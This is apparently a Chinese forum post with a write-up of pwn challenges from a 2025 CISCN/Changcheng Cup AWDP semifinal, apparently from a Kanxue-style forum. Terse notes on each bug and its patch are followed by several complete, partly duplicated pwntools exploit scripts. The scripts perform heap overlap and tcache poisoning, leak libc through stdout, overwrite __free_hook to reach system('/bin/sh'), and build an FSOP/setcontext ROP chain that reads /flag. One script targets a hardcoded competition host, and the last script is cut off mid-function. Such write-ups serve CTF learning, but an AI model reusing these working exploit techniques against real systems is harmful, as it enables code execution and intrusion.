[原创]CCB_CISCN_半决赛-AWDP-Pwn
发表于: 2025-3-18 18:24 8910
第十八届全国大学生信息安全竞赛(创新实践能力赛)暨第二届“长城杯”铁人三项赛(防护赛)半决赛 AWDP-pwn题题解
没有show, 构造堆块 ub 和 tcache fd重叠, 后面1/16 概率,申请到 _IO_2_1_stdout_-0x10
成功的情况下
最终脚本
错误的传参，存在格式字符串漏洞，这里也会导致堆溢出
把原本的 snprintf 函数 nop 掉即可
protobuf,堆溢出漏洞
堆块大小改大
free 后指针仍然存在，应该存在 UAF 漏洞
clear() 后仍然可以对堆块操作，修改链表即可实现任意地址申请
把申请的堆块大小固定成一个大的 size
不看
idx 改小
from pwn import *#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)sa = lambda x,y : io.sendafter(x,y)sl = lambda x : io.sendline(x)sla = lambda x,y : io.sendlineafter(x,y)r = lambda x : io.recv(x)ru = lambda x : io.recvuntil(x)rl = lambda : io.recvline()itr = lambda : io.interactive()uu32 = lambda x : u32(x.ljust(4,b'\x00'))uu64 = lambda x : u64(x.ljust(8,b'\x00'))ls = lambda x : log.success(x)lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))attack = '10.10.1.113 28142'.replace(' ',':')binary = './pwn'def start(argv=[], *a, **kw): if args.GDB:return gdb.debug(binary,gdbscript) if args.TAG:return remote(*args.TAG.split(':')) if args.REM:return remote(*attack.split(':')) return process([binary] + argv, *a, **kw)#context(log_level = 'debug')context(binary = binary, log_level = 'debug',terminal='tmux splitw -h -l 170'.split(' '))libc = context.binary.libcelf = ELF(binary)#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''brva 0x001698brva 0x01754 #continue'''.format(**locals())#import os#os.systimport os#io = remote(*attack.split(':'))def add(idx,size): ru('>> ') sl('1') ru(':') sl(str(idx)) ru(': ') sl(str(size))def rm(idx): ru('>> ') sl('2') ru(':') sl(str(idx))def edit(idx,size,text): ru('>> ') sl('3') ru(':') sl(str(idx)) ru(': ') sl(str(size)) ru(': ') s(text)for i in range(100): io = start([]) add(0,0x80) add(1,0xF0) add(2,0xF0) add(3,0xF0) add(4,0xF0) add(5,0xF0) add(6,0xe0) add(7,0xe0) ru('>> ') sl('3') ru(':') sl('0') ru(': ') pay = b'A'* 0x90 pay += p64(0xFFFF) s(pay) ru(': ') s('TEST') pay = b'\x00' * 0xF0 pay += p64(0x100*4+0xF1) edit(1,0x200,pay) rm(4) rm(3) rm(2) stdout = (libc.sym['_IO_2_1_stdout_'] - 0x10) & 0x0FFF lss('stdout') add(2,0x70) add(3,0x70) try: pay = b'\x00' * 0x1f8 pay += p16(stdout + 0x2000) edit(1,len(pay), pay) add(8,0xF0) add(9,0xF0) pay = p64(0) pay += p64(0xFBAD1800) + p64(0) * 3 + 
p8(0) edit(9,len(pay), pay) io.recvuntil('\x00'*8) libc_base = uu64(r(8)) - 2017664 libc.address = libc_base free_hook = libc.sym['__free_hook'] lss('libc_base') pause() rm(7) rm(6) pay = 0x4f8 * b'\x00' + p64(free_hook - 0x10) edit(1,len(pay), pay) add(6,0xe0) add(7,0xe0) edit(7,0x40,p64(0)+p64(libc.sym['system'])) pay = 0xF8 * '/' + '/bin/sh\x00' edit(1,len(pay), pay) rm(2) #gdb.attach(io,gdbscript=gdbscript) io.interactive() except: io.close() passitr()from pwn import *#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)sa = lambda x,y : io.sendafter(x,y)sl = lambda x : io.sendline(x)sla = lambda x,y : io.sendlineafter(x,y)r = lambda x : io.recv(x)ru = lambda x : io.recvuntil(x)rl = lambda : io.recvline()itr = lambda : io.interactive()uu32 = lambda x : u32(x.ljust(4,b'\x00'))uu64 = lambda x : u64(x.ljust(8,b'\x00'))ls = lambda x : log.success(x)lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))attack = '10.10.1.113 28142'.replace(' ',':')binary = './pwn'def start(argv=[], *a, **kw): if args.GDB:return gdb.debug(binary,gdbscript) if args.TAG:return remote(*args.TAG.split(':')) if args.REM:return remote(*attack.split(':')) return process([binary] + argv, *a, **kw)#context(log_level = 'debug')context(binary = binary, log_level = 'debug',terminal='tmux splitw -h -l 170'.split(' '))libc = context.binary.libcelf = ELF(binary)#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''brva 0x001698brva 0x01754 #continue'''.format(**locals())#import os#os.systimport os#io = remote(*attack.split(':'))def add(idx,size): ru('>> ') sl('1') ru(':') sl(str(idx)) ru(': ') sl(str(size))def rm(idx): ru('>> ') sl('2') ru(':') sl(str(idx))def edit(idx,size,text): ru('>> ') sl('3') ru(':') sl(str(idx)) ru(': ') sl(str(size)) ru(': ') s(text)for i in range(100): io = start([]) add(0,0x80) add(1,0xF0) add(2,0xF0) add(3,0xF0) add(4,0xF0) 
add(5,0xF0) add(6,0xe0) add(7,0xe0) ru('>> ') sl('3') ru(':') sl('0') ru(': ') pay = b'A'* 0x90 pay += p64(0xFFFF) s(pay) ru(': ') s('TEST') pay = b'\x00' * 0xF0 pay += p64(0x100*4+0xF1) edit(1,0x200,pay) rm(4) rm(3) rm(2) stdout = (libc.sym['_IO_2_1_stdout_'] - 0x10) & 0x0FFF lss('stdout') add(2,0x70) add(3,0x70) try: pay = b'\x00' * 0x1f8 pay += p16(stdout + 0x2000) edit(1,len(pay), pay) add(8,0xF0) add(9,0xF0) pay = p64(0) pay += p64(0xFBAD1800) + p64(0) * 3 + p8(0) edit(9,len(pay), pay) io.recvuntil('\x00'*8) libc_base = uu64(r(8)) - 2017664 libc.address = libc_base free_hook = libc.sym['__free_hook'] lss('libc_base') pause() rm(7) rm(6) pay = 0x4f8 * b'\x00' + p64(free_hook - 0x10) edit(1,len(pay), pay) add(6,0xe0) add(7,0xe0) edit(7,0x40,p64(0)+p64(libc.sym['system'])) pay = 0xF8 * '/' + '/bin/sh\x00' edit(1,len(pay), pay) rm(2) #gdb.attach(io,gdbscript=gdbscript) io.interactive() except: io.close() passitr()syntax = "proto3";package mypackage;message pwn2 { int32 option = 1; int32 chunk_sizes = 2; int32 heap_chunks_id = 3; bytes heap_content = 4;}// protoc --python_out=. pwn2.protosyntax = "proto3";package mypackage;message pwn2 { int32 option = 1; int32 chunk_sizes = 2; int32 heap_chunks_id = 3; bytes heap_content = 4;}// protoc --python_out=. 
pwn2.protofrom pwn import *#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)sa = lambda x,y : io.sendafter(x,y)sl = lambda x : io.sendline(x)sla = lambda x,y : io.sendlineafter(x,y)r = lambda x : io.recv(x)ru = lambda x : io.recvuntil(x)rl = lambda : io.recvline()itr = lambda : io.interactive()uu32 = lambda x : u32(x.ljust(4,b'\x00'))uu64 = lambda x : u64(x.ljust(8,b'\x00'))ls = lambda x : log.success(x)lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))attack = ''.replace(' ',':')binary = './pwn'def start(argv=[], *a, **kw): if args.GDB:return gdb.debug(binary,gdbscript) if args.TAG:return remote(*args.TAG.split(':')) if args.REM:return remote(*attack.split(':')) return process([binary] + argv, *a, **kw)#context(log_level = 'debug')context(binary = binary, log_level = 'debug',terminal='tmux splitw -h -l 170'.split(' '))libc = context.binary.libc#elf = ELF(binary)#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''brva 0x1DECbrva 0x01BD6#continue'''.format(**locals())#import os#os.systimport os#io = remote(*attack.split(':'))io = start([])import pwn2_pb2# syntax = "proto3";# package mypackage;# message pwn2 {# int32 option = 1;# int32 chunk_sizes = 2;# int32 heap_chunks_id = 3;# bytes heap_content = 4;# }def add(size,text=b'123',idx=0): ru('Your prompt >> ') data = pwn2_pb2.pwn2() data.option = 1; data.chunk_sizes = size data.heap_chunks_id = idx data.heap_content = text raw = data.SerializeToString() print(hexdump(raw)) pay = p32(len(raw)) + raw s(pay)def rm(idx,size=0,text=b'123'): ru('Your prompt >> ') data = pwn2_pb2.pwn2() data.option = 2; data.chunk_sizes = size data.heap_chunks_id = idx data.heap_content = text raw = data.SerializeToString() print(hexdump(raw)) pay = p32(len(raw)) + raw s(pay)def edit(idx,size=0,text=b'123'): ru('Your prompt >> ') data = pwn2_pb2.pwn2() data.option = 3; data.chunk_sizes = size 
data.heap_chunks_id = idx data.heap_content = text raw = data.SerializeToString() print(hexdump(raw)) pay = p32(len(raw)) + raw s(pay)def show(idx,size=0,text=b'123'): ru('Your prompt >> ') data = pwn2_pb2.pwn2() data.option = 4; data.chunk_sizes = 1 data.heap_chunks_id = idx data.heap_content = text raw = data.SerializeToString() print(hexdump(raw)) pay = p32(len(raw)) + raw s(pay)# 这里的堆块基本都是连续在一起的,后续溢出就方便很多add(0x100, b'1')add(0x100, b'2')add(0x100, b'3')add(0x100, b'4')add(0x100, b'5')add(0x100, b'6')add(0x100, b'7')add(0x100, b'8')pay = b'A' * 0x108 + p64(0x110 * 4 +1)edit(1,len(pay),pay)rm(2)add(0x100, b'8')show(3)ru(': ')libc_base = uu64(r(6)) - 2169632libc.address = libc_baselss('libc_base')add(0x100, b'8')rm(8)show(3)ru(': ')key = uu64(r(5))heap_base = key << 0xCrm(2)pay = b'A' * 0x108 + p64(0x111)pay += p64(key ^ libc.sym['_IO_2_1_stdout_'])edit(1,len(pay),pay)add(0x100, b'7')# 模板orw 嗦fake_IO_addr = libc.sym['_IO_2_1_stdout_']pay = flat({ 0x00: ' sh;', 0x18: libc.sym['setcontext'] + 61, 0x20: fake_IO_addr, # 0x20 > 0x18 0x68: fake_IO_addr, # rdi #read fd 0x70: 0, # rsi #read buf 0x78: fake_IO_addr, # rsi2 #read buf 0x88: fake_IO_addr + 0x8, # rdx #read size 0x90: 0x400, # rdx2 #read size 0x98: 0x23, # rdx #read size 0xa0: fake_IO_addr, 0xa8: libc.sym['setcontext'] + 294, # RCE2 ogg 0xb0: libc.sym['read'], # RCE2 ogg 0xd8: libc.sym['_IO_wfile_jumps'] + 0x30 - 0x20, 0xe0: fake_IO_addr, },filler=b'\x00')gdb.attach(io,gdbscript)add(0x100, pay)pause()libc.address = libc_baselibc_rop = ROP(libc)rax = libc_rop.find_gadget(['pop rax','ret'])[0]rdi = libc_rop.find_gadget(['pop rdi','ret'])[0]rsi = libc_rop.find_gadget(['pop rsi','ret'])[0]m = 0try: rdx = libc_rop.find_gadget(['pop rdx','ret'])[0];m = 1except: rdx = libc_rop.find_gadget(['pop rdx','pop rbx','ret'])[0]; m = 2syscall = libc_rop.find_gadget(['syscall','ret'])[0]orw_rop_addr = fake_IO_addr # ret to addrbuf = orw_rop_addr + 0xa0 + m*3*8orw_rop = p64(rax) + p64(2) + p64(rdi) + p64(buf) + p64(rsi) + p64(0) 
+ p64(rdx) + p64(0)*m + p64(syscall)orw_rop += p64(rdi) + p64(3) + p64(rsi) + p64(buf) + p64(rdx) + p64(0x100)*m + p64(libc.sym['read'])orw_rop += p64(rdi) + p64(1) + p64(rsi) + p64(buf) + p64(rdx) + p64(0x100)*m + p64(libc.sym['write'])orw_rop += b'/flag'.ljust(0x10,b'\x00')sl(orw_rop)lss('libc_base')lss('key')lss('heap_base')#pay = flat({#},filler=b'\x00')# libc.address = libc_base# system = libc.sym['system']# bin_sh = next(libc.search(b'/bin/sh'))itr()from pwn import *#from ctypes import CDLL#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')s = lambda x : io.send(x)sa = lambda x,y : io.sendafter(x,y)sl = lambda x : io.sendline(x)sla = lambda x,y : io.sendlineafter(x,y)r = lambda x : io.recv(x)ru = lambda x : io.recvuntil(x)rl = lambda : io.recvline()itr = lambda : io.interactive()uu32 = lambda x : u32(x.ljust(4,b'\x00'))uu64 = lambda x : u64(x.ljust(8,b'\x00'))ls = lambda x : log.success(x)lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))attack = ''.replace(' ',':')binary = './pwn'def start(argv=[], *a, **kw): if args.GDB:return gdb.debug(binary,gdbscript) if args.TAG:return remote(*args.TAG.split(':')) if args.REM:return remote(*attack.split(':')) return process([binary] + argv, *a, **kw)#context(log_level = 'debug')context(binary = binary, log_level = 'debug',terminal='tmux splitw -h -l 170'.split(' '))libc = context.binary.libc#elf = ELF(binary)#print(context.binary.libs)#libc = ELF('./libc.so.6')#import socks#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)gdbscript = '''brva 0x1DECbrva 0x01BD6#continue'''.format(**locals())#import os#os.systimport os#io = remote(*attack.split(':'))io = start([])import pwn2_pb2# syntax = "proto3";# package mypackage;# message pwn2 {# int32 option = 1;# int32 chunk_sizes = 2;# int32 heap_chunks_id = 3;# bytes heap_content = 4;# }def add(size,text=b'123',idx=0): ru('Your prompt >> ')赞赏记录